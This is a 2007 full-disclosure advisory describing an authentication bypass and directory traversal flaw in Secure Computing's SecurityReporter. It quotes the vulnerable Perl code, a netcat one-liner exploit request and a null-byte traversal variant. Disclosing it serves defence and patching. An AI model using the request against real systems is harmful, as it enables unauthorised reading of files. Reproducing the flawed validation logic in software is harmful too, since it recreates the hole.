Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17582
HistoryJul 23, 2007 - 12:00 a.m.

[Full-disclosure] Secure Computing - Security Reporter Auth Bypass and Directory Traversal Vulnerability

2007-07-2300:00:00
vulners.com
18
securityreporter
authentication
bypass
directory traversal
vulnerability
win32
secure computing
realtime security intelligence
compliance requirements
oem partnership
network security analyzer
exploitation
sourcecode
apache installation
remote access
cgi script
user validation

SECURITYREPORTER - AUTHENTICATION BYPASS AND DIRECTORY TRAVERSAL
VULNERABILITY

Product: SecurityReporter
Version: 4.6.3 Build Date: 04/20/2007
Platform: Win32
Vendor: Secure Computing (www.securecomputing.com)

Product Description

"SecurityReporter is a security event analysis and reporting solution
for the
Sidewinder Security Appliance, providing realtime security intelligence
to help
decipher hacker/virus behavior, combat security threats, and help meet
compliance requirements."

Vendor Description

SecurityReporter is manufactured under an OEM partnership between
Secure Computing and eIQnetworks. The product is also known as "Network
Security Analyzer". According to eIQnetworks, Security Analyzer is also
part of products of the following companies:

    - Top Layer Networks
    - Clavister
    - Astaro
    - Reflex Security
    - H3C
    - Piolink
    - MiraPoint

Vulnerability-Overview

SecurityReporter is vulnerable to an authentication bypass and directory
traversal attack.
It is possible to access files inside and outside the application root
directory from remote without authentication.

During the installation of SecurityReporter it can be chosen between an
dedicated Apache installation (which is included within the install
package) and the usage of an
pre-installed Internet Information Server.

In case of the Apache, access to the files is executed with local system
account privileges by default.

Exploitation

The following request fetches the sourcecode of the script itself, but
can also be used to access any other file on the partition:

echo -e "GET /cgi-bin/file.cgi?name=/eventcache/…/cgi-bin/file.cgi
HTTP/1.0\r\n\r\n" | nc <ip> <port>

Vulnerability Details

The authentication can be bypassed because of the following code within
"file.cgi":

    8 $name = $field{&#39;name&#39;};
    9
    10 #for gif images we dont care about authorization so just  serve it

without
11 #bothering the reporting engine again. See bug: 3676 for
details.
12 $dontvalidate = "false";
13 if ($name =~ /^[a-zA-Z0-9\-\. _\/ ]+\.(gif)$/) {
14 $dontvalidate = "true";
15 print "Content-Type: image/gif\n";
16 binmode STDOUT;
17 }
18 elsif ($name =~ /^\/eventcache\//) {
19 $dontvalidate = "true";
20 print "Content-Type: text/html\n";
21 binmode STDOUT;
22}

If the value of the parameter "name" does not match to line 13 (which
can be enforced by not requesting a ".gif" file) the condition in line
18 is checked.
If the value of "name" does start with the directory "/eventcache/",
$dontvalidate is set to "true", thus disabling uservalidation.

(addition: the regex in line 13 could be bypassed with null-byte attack
in older versions of this application, by requesting a file like
…/…/…/…/boot.ini%00.gif. But this is fixed in the current version
within the file GeneralUtilities.pm which is included to most pl-files)

The directory traversal is possible because there is no normalization of
the input and filtering of dots and slashes/backslashes within
"file.cgi":

    165 #on windows 2003 IIS the cur dir is the root itself- dont

know why so we try to open it in
166 #path relative to root if …/ from cgi-bin fails
167 open(f, "…/$name") or open(f, "$name") or die "File
($name): $!";

PATCH

All SecurityReporter customers have been sent an email by the venodr,
describing the vulnerability with a link to a patch.

Discovered

By Oliver Karow ([email protected]) on Tuesday, 05. June 2007
http://www.oliverkarow.de/research/securityreporter.txt


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/